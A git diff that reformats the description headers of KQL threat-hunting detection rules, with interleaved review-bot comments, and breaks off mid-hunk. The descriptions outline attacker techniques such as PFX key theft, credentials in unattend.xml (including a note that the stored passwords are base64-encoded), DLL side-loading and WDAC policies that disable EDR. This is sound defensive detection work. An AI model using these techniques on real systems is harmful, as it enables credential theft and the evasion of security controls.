diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
index a108ce05..e49ecfba 100644
--- a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
+++ b/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql
@@ -3,14 +3,11 @@
 // Date: 2020-05-02
 // Level: low
 // Description: Detects the creation of PFX files (Personal Information Exchange format).
-PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
-
- - Exfiltrate digital certificates for impersonation or signing malicious code
- - Establish persistent access through certificate-based authentication
- - Bypass security controls that rely on certificate validation
-
-Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
-
+// PFX files contain private keys and certificates bundled together, making them valuable targets for attackers seeking to:
+// - Exfiltrate digital certificates for impersonation or signing malicious code
+// - Establish persistent access through certificate-based authentication
+// - Bypass security controls that rely on certificate validation
+// Analysts should investigate PFX file creation events by examining which process created the PFX file and its parent process chain, as well as unusual locations outside standard certificate stores or development environments.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.004, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
index 01401fe1..7893ac39 100644
--- a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
+++ b/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-22
 // Level: low
 // Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored.
-This file is used during the unattended windows install process.
-
+// This file is used during the unattended windows install process.
 // MITRE Tactic: Credential Access
 // Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
index 12150d0e..09dbf8fb 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql
@@ -3,9 +3,8 @@
 // Date: 2024-05-10
 // Level: low
 // Description: Detects file access requests to Windows Outlook Mail by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
 // MITRE Tactic: Defense Evasion
 // Tags: attack.t1070.008, attack.defense-evasion, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
index c25c1963..52b3cc90 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql
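Review bot: The comment this hunk moves into the unattend.xml header says credentials `might be stored` there but gives the analyst nothing to act on when the hit fires; one caveat would speed up triage, e.g. `// Passwords in unattend.xml are typically base64-encoded inside <Password><Value> elements (AutoLogon / UserAccounts) rather than plaintext, so decode before deciding whether a usable secret is still present.`. While touching the line, `windows` should be capitalised: `// This file is used during the unattended Windows install process.`. The query body, and therefore which unattend.xml locations it covers, is outside this hunk.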
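Review bot: The two comment lines this hunk moves into the Outlook Mail header say the rule `Could indicate potential attempt of credential stealing`, yet the MITRE Tactic and Tags lines two lines below classify it as Defense Evasion / T1070.008 (Clear Mailbox Data), so the description and the classification contradict each other. Either the description should state the defense-evasion angle, e.g. `// Uncommon processes accessing the Windows Mail / Outlook Mail store may indicate mailbox tampering or deletion (T1070.008) as well as data theft.`, or the tactic and tags should be revisited; which is correct depends on the query body, which is outside this hunk.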
@@ -3,8 +3,7 @@
 // Date: 2025-06-04
 // Level: low
 // Description: Detects an uncommon process loading the "BitsProxy.dll". This DLL is used when the BITS COM instance or API is used.
-This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
-
+// This detection can be used to hunt for uncommon processes loading this DLL in your environment. Which may indicate potential suspicious activity occurring.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1197, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
index e433f0e5..ab2561de 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql
@@ -3,8 +3,7 @@
 // Date: 2024-01-19
 // Level: low
 // Description: Detects a CodePage modification using the "mode.com" utility.
-This behavior has been used by threat actors behind Dharma ransomware.
-
+// This behavior has been used by threat actors behind Dharma ransomware.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
index c4dbc326..e997e57b 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2020-10-07
 // Level: medium
 // Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
index 252d516e..9b5c93dc 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
@@ -3,9 +3,8 @@
 // Date: 2020-07-13
 // Level: medium
 // Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
+// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
+// An initial baseline is recommended before deployment.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
index 8fa5768b..070e25d4 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-23
 // Level: medium
 // Description: Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
-The "--headless" flag hides the windows from the user upon execution.
-
+// The "--headless" flag hides the windows from the user upon execution.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
index 34135174..247d2d13 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql
@@ -3,7 +3,6 @@
 // Date: 2022-10-05
 // Level: medium
 // Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
index ec7342ce..ed29b57e 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -3,9 +3,8 @@
 // Date: 2023-12-01
 // Level: medium
 // Description: Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
-The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
-These can be used for example in decrypting malicious payload for defense evasion.
-
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1027.010, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
index 8ba554cb..e7d53510 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2019-01-16
 // Level: medium
 // Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1218, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
index 98995797..e2c4ffb4 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql
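Review bot: The first added comment line calls `System.Security.Cryptography` a `PowerShell namespace`; it is a .NET namespace that PowerShell only reaches through `[System.Security.Cryptography.*]` type references, and the rule's detection logic presumably keys on exactly that textual reference in the command line, so the header should say so. Suggest `// The .NET namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption, reachable from PowerShell via [System.Security.Cryptography.*] type references.`. The same two sentences appear in the registry_set variant of this rule later in the patch and would want the same wording.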
@@ -3,9 +3,8 @@
 // Date: 2022-01-16
 // Level: low
 // Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
-Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
-Use this rule to hunt for potentially anomalous or suspicious communications.
-
+// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
+// Use this rule to hunt for potentially anomalous or suspicious communications.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
index 7822f107..58fe2b64 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2024-02-05
 // Level: medium
 // Description: Detects the "iexpress.exe" utility creating self-extracting packages.
-Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
-Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
-
+// Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
+// Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
 // False Positives:
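Review bot: The first added comment line in the iexpress hunk reads `Attackers where seen`, which should be `were seen`: `// Attackers were seen leveraging "iexpress" to compile packages on the fly via ".sed" files.`. The second line tells the analyst to check the .sed contents; since the .sed is a build input the attacker controls and may remove, a hint such as `// Retrieve the .sed file and the files it references promptly; the resulting package path is the TargetName declared inside the .sed.` would make the guidance actionable, noting that I cannot see from this hunk whether the query captures the .sed path from the command line.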
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
index 7a55ac05..b39d3ae1 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
@@ -3,7 +3,6 @@
 // Date: 2024-05-03
 // Level: low
 // Description: Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.004, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
index 00bd0c46..7219b8ac 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-15
 // Level: medium
 // Description: Detects potential CommandLine obfuscation using unicode characters.
-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
index 2f96cedb..0277d730 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2021-11-26
 // Level: medium
 // Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
-It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
-Arbitrary DLLs can also be loaded if a specific number of flags was provided.
-
+// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
+// Arbitrary DLLs can also be loaded if a specific number of flags was provided.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
index fdebae7b..a75cc6de 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
@@ -3,10 +3,9 @@
 // Date: 2020-10-05
 // Level: low
 // Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
-Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
-While this is often a legitimate action, this rule can be use to hunt for anomalies.
-Muddy Waters threat actor was seeing using this technique.
-
+// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
+// While this is often a legitimate action, this rule can be use to hunt for anomalies.
+// Muddy Waters threat actor was seeing using this technique.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
index d96fbbb5..f7636048 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-01
 // Level: low
 // Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
-Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
-
+// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
 // False Positives:
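Review bot: The three added comment lines in the explorer.exe hunk carry wording errors into the header: `can be use` for `can be used`, `was seeing using` for `was seen using`, and the actor name written as `Muddy Waters` where the commonly used tracking name is MuddyWater. Suggest `// While this is often a legitimate action, this rule can be used to hunt for anomalies.` and `// The MuddyWater threat actor was seen using this technique.`. Because the description says the pattern is "often a legitimate action", the empty `// False Positives:` line that closes the hunk is where the known-benign parents (for example scripts that open a folder via `explorer.exe <path>`) should be listed; the value of that field is outside this hunk.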
diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
index 08a3a179..d9e0f02d 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
@@ -3,9 +3,8 @@
 // Date: 2023-12-01
 // Level: medium
 // Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
-The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
-These can be used for example in decrypting malicious payload for defense evasion.
-
+// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
+// These can be used for example in decrypting malicious payload for defense evasion.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
index 7d19e144..3cd4b760 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-17
 // Level: medium
 // Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
index 6e4e0931..0e9d4b86 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
@@ -3,10 +3,9 @@
 // Date: 2022-05-02
 // Level: medium
 // Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
-Attackers often use such directories for staging purposes.
-This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
-Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
-
+// Attackers often use such directories for staging purposes.
+// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
+// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting
diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
index b5e41b44..72cd5fbf 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
@@ -3,13 +3,12 @@
 // Date: 2022-08-07
 // Level: medium
 // Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
-Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
-When investigating, examine:
-- Commands using short paths to access sensitive directories or files
-- Web servers on Windows (especially Apache) where short filenames could bypass security controls
-- Correlation with other suspicious behaviors
-- baseline of short name usage in your environment and look for deviations
-
+// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
+// When investigating, examine:
+// - Commands using short paths to access sensitive directories or files
+// - Web servers on Windows (especially Apache) where short filenames could bypass security controls
+// - Correlation with other suspicious behaviors
+// - baseline of short name usage in your environment and look for deviations
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
index 4401f8f5..4e321041 100644
--- a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
+++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql
@@ -3,7 +3,6 @@
 // Date: 2025-01-30
 // Level: medium
 // Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
index 483171eb..577c5378 100644
--- a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
+++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-22
 // Level: low
 // Description: Detects the use of the redirection character ">" to redirect information on the command line.
-This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1082, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
index a977aa0f..42e3ae8a 100644
--- a/KQL/rules-threat-hunting/Discovery/process_discovery.kql
+++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-06
 // Level: low
 // Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
-Information obtained could be used to gain an understanding of common software/applications running on systems within the network
-
+// Information obtained could be used to gain an understanding of common software/applications running on systems within the network
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1057, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
index 421a4caf..9e9e7d55 100644
--- a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
+++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2023-12-19
 // Level: low
 // Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
-and GPU driver products/versions.
-
+// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
+// and GPU driver products/versions.
 // MITRE Tactic: Discovery
 // Tags: attack.discovery, attack.t1082, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
index 19469938..a4b8858b 100644
--- a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
+++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql
@@ -3,7 +3,6 @@
 // Date: 2020-10-05
 // Level: medium
 // Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
index bfb6db93..e6fb7135 100644
--- a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
+++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-04
 // Level: medium
 // Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
-
 // MITRE Tactic: Execution
 // Tags: attack.execution, detection.threat-hunting
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
index 1c82dc75..99233110 100644
--- a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
+++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2024-11-01
 // Level: low
 // Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
-This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
-
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
 // MITRE Tactic: Execution
 // Tags: detection.threat-hunting, attack.execution
 // False Positives:
diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
index cf46b317..99d5a379 100644
--- a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
+++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
@@ -3,14 +3,11 @@
 // Date: 2023-02-15
 // Level: medium
 // Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.
-
-From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
- 1. Compressed file opened using 7zip.
- 2. Compressed file opened using WinRar.
- 3. Compressed file opened using native windows File Explorer capabilities.
-
